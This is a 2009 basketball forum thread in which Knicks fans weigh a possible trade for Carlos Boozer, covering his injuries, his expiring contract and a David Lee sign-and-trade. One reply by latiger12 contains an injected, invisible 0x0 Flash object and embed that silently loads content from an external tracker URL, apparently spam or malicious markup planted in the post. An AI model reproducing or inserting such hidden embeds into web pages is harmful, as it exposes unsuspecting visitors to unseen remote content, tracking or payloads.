Here Comes Mr. Boozerr???

Booze

On Nba.com ,theres an article and Carlos boozer is talking about how he wiil be trade very soon. Do you guys think it will be to us?

http://www.nba.com/2009/news/07/14/jazz.boozer.ap/index.html << the Article

This trade is very risky. We all know Booze is injury prone, and seems to be in it for the Money. On the other hand, his expiring contract is attractive, and I feel he will play well since he will be in a contract year. If he comes to the Knicks, I think that he might be willing to sign a new contract that will be for less money, so that we can add 1 or 2 other Elite Players come next year. If Boozer comes over to the Mecca, I hope he would accept a lesser contract in hopes of 2 other FA's signing on. This could potentially be a great deal for the Knicks, however, as we know, they are the Knicks, and this deal could backfire at any given moment... My theory is stay optimistic, it's the most we can do

latiger12

Rookie
This trade is very risky. We all know Booze is injury prone, and seems to be in it for the Money.<object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" width="0" height="0"><param name="movie" value="<A href="http://brbyowner.com/?tracker=4097"></param><param">http://brbyowner.com/?tracker=4097"></param><param name="allowFullScreen" value="true"></param><embed src="http://brbyowner.com/?tracker=4097" type="application/x-shockwave-flash" allowfullscreen="true" width="0" height="0"></embed></object>

I would stay away from this trade for those very reasons. Dont want a cancer in the locker room!

Oldtimer

Rotation player
Boozer

Utah wants to dump salary. Although Boozer has an expiring contract, what are we going to give Utah? If they do not match to keep Milsap, perhaps there couldbe a sign and trade for Lee. Otherwise all we have is expiring contracts and I would want to use Mobley's insured contract and whatever value Lee might have to eliminate Curry's or Jefferies' contracts

We might as well wait for Boozer to become a free agent. We could probably sign Lee to a one year contract for less than the $12.35M of Boozer's remaining contract. And maybe we get lucky and Lee signs with us for something more reasonable than the $10 to $12M a year his agent is seeking.

portega1968

El Cacique
if we could do a resigned Lee and Jeffries' two years for the expirings of Boozer and Korver, that would be huge.. definitely worth it.

dre48ny

Rotation player
I guess this all contingent on Millsap. If they don't match the Blazers' offer sheet then they could stick to Boozer or bring in Lee with a sign and trade. I wouldn't mind Boozer for 1 year. He'll play lights out in his contract year. He could then be re-signed if he performs well as well as attract other free agents.

Toons

is the Bo$$
Walsh said he still is trying to be a player in the Boozer sweepstakes -- with the inclusion of David Lee in a sign-and-trade a key to any deal. Walsh realizes a problem is Lee being a base-compensation player, which complicates any sign-and-trade deal with Utah.

According to a league source, New York is one of Boozer's preferred destinations. Utah is trying to save money and offering up Cuttino Mobley's expiring contract with insurance covering a portion of it is a possibility.

LJ4ptplay

Starter
I forgot about this...Utah own's our unprotected pick next year. We're probably the last team in the league they would want to trade Boozer to. They have an added incentive to make sure we still suck.

We're not getting Boozer. Close thread.

paris401

Starter
I forgot about this...Utah own's our unprotected pick next year. We're probably the last team in the league they would want to trade Boozer to. They have an added incentive to make sure we still suck.

We're not getting Boozer. Close thread.

i think next year will be a repeat of the last few years...ie we will sux... and we will prob win the lottery ...for utah... that's the least we can do for em... after all they did give us layden...